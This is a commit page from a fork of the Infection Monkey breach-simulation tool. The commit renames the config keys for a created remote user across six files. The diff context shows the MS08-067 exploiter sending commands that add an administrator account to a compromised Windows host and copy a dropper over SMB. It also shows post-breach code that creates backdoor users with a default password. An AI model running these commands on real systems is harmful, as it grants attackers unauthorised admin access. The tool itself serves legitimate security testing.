p41275903
/
monkey
forked from p15670423/monkey
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

Rename ms08_067_remote_user_add and ms08_067_remote_user_pass to something more generic

This commit is contained in:
Daniel Goldberg 2019-01-07 10:58:20 +02:00
parent 70545d28f8
commit 68093d084f
6 changed files with 18 additions and 18 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
monkey/infection_monkey/config.py
View File

@ -208,8 +208,8 @@ class Configuration(object):
skip_exploit_if_file_exist = False skip_exploit_if_file_exist = False
ms08_067_exploit_attempts = 5 ms08_067_exploit_attempts = 5
ms08_067_remote_user_add = "Monkey_IUSER_SUPPORT" user_to_add = "Monkey_IUSER_SUPPORT"
ms08_067_remote_user_pass = "Password1!" remote_user_pass = "Password1!"
# rdp exploiter # rdp exploiter
rdp_use_vbs_download = True rdp_use_vbs_download = True

4
monkey/infection_monkey/example.conf
View File

@ -57,8 +57,8 @@
"monkey_log_path_linux": "/tmp/user-1563", "monkey_log_path_linux": "/tmp/user-1563",
"send_log_to_server": true, "send_log_to_server": true,
"ms08_067_exploit_attempts": 5, "ms08_067_exploit_attempts": 5,
"ms08_067_remote_user_add": "Monkey_IUSER_SUPPORT", "user_to_add": "Monkey_IUSER_SUPPORT",
"ms08_067_remote_user_pass": "Password1!", "remote_user_pass": "Password1!",
"ping_scan_timeout": 10000, "ping_scan_timeout": 10000,
"rdp_use_vbs_download": true, "rdp_use_vbs_download": true,
"smb_download_timeout": 300, "smb_download_timeout": 300,

12
monkey/infection_monkey/exploit/win_ms08_067.py
View File

@ -192,9 +192,9 @@ class Ms08_067_Exploiter(HostExploiter):
sock.send("cmd /c (net user %s %s /add) &&" sock.send("cmd /c (net user %s %s /add) &&"
" (net localgroup administrators %s /add)\r\n" % " (net localgroup administrators %s /add)\r\n" %
(self._config.ms08_067_remote_user_add, (self._config.user_to_add,
self._config.ms08_067_remote_user_pass, self._config.remote_user_pass,
self._config.ms08_067_remote_user_add)) self._config.user_to_add))
time.sleep(2) time.sleep(2)
reply = sock.recv(1000) reply = sock.recv(1000)
@ -213,8 +213,8 @@ class Ms08_067_Exploiter(HostExploiter):
remote_full_path = SmbTools.copy_file(self.host, remote_full_path = SmbTools.copy_file(self.host,
src_path, src_path,
self._config.dropper_target_path_win_32, self._config.dropper_target_path_win_32,
self._config.ms08_067_remote_user_add, self._config.user_to_add,
self._config.ms08_067_remote_user_pass) self._config.remote_user_pass)
if not remote_full_path: if not remote_full_path:
# try other passwords for administrator # try other passwords for administrator
@ -240,7 +240,7 @@ class Ms08_067_Exploiter(HostExploiter):
try: try:
sock.send("start %s\r\n" % (cmdline,)) sock.send("start %s\r\n" % (cmdline,))
sock.send("net user %s /delete\r\n" % (self._config.ms08_067_remote_user_add,)) sock.send("net user %s /delete\r\n" % (self._config.user_to_add,))
except Exception as exc: except Exception as exc:
LOG.debug("Error in post-debug phase while exploiting victim %r: (%s)", self.host, exc) LOG.debug("Error in post-debug phase while exploiting victim %r: (%s)", self.host, exc)
return False return False

6
monkey/infection_monkey/post_breach/add_user.py
View File

@ -36,14 +36,14 @@ class BackdoorUser(object):
def add_user_linux(): def add_user_linux():
cmd_line = ['useradd', '-M', '--expiredate', cmd_line = ['useradd', '-M', '--expiredate',
datetime.datetime.today().strftime('%Y-%m-%d'), '--inactive', '0', '-c', 'MONKEY_USER', datetime.datetime.today().strftime('%Y-%m-%d'), '--inactive', '0', '-c', 'MONKEY_USER',
WormConfiguration.ms08_067_remote_user_add] WormConfiguration.user_to_add]
retval = subprocess.call(cmd_line) retval = subprocess.call(cmd_line)
return retval return retval
@staticmethod @staticmethod
def add_user_windows(): def add_user_windows():
cmd_line = ['net', 'user', WormConfiguration.ms08_067_remote_user_add, cmd_line = ['net', 'user', WormConfiguration.user_to_add,
WormConfiguration.ms08_067_remote_user_pass, WormConfiguration.remote_user_pass,
'/add', '/ACTIVE:NO'] '/add', '/ACTIVE:NO']
retval = subprocess.call(cmd_line) retval = subprocess.call(cmd_line)
return retval return retval

2
monkey/infection_monkey/system_info/windows_info_collector.py
View File

@ -36,7 +36,7 @@ class WindowsInfoCollector(InfoCollector):
""" """
LOG.debug("Running Windows collector") LOG.debug("Running Windows collector")
super(WindowsInfoCollector, self).get_info() super(WindowsInfoCollector, self).get_info()
self.get_wmi_info() #self.get_wmi_info()
self.get_installed_packages() self.get_installed_packages()
from infection_monkey.config import WormConfiguration from infection_monkey.config import WormConfiguration
if WormConfiguration.should_use_mimikatz: if WormConfiguration.should_use_mimikatz:

8
monkey/monkey_island/cc/services/config_schema.py
View File

@ -701,14 +701,14 @@ SCHEMA = {
"default": 5, "default": 5,
"description": "Number of attempts to exploit using MS08_067" "description": "Number of attempts to exploit using MS08_067"
}, },
"ms08_067_remote_user_add": { "user_to_add": {
"title": "MS08_067 remote user", "title": "Remote user",
"type": "string", "type": "string",
"default": "Monkey_IUSER_SUPPORT", "default": "Monkey_IUSER_SUPPORT",
"description": "Username to add on successful exploit" "description": "Username to add on successful exploit"
}, },
"ms08_067_remote_user_pass": { "remote_user_pass": {
"title": "MS08_067 remote user password", "title": "Remote user password",
"type": "string", "type": "string",
"default": "Password1!", "default": "Password1!",
"description": "Password to use for created user" "description": "Password to use for created user"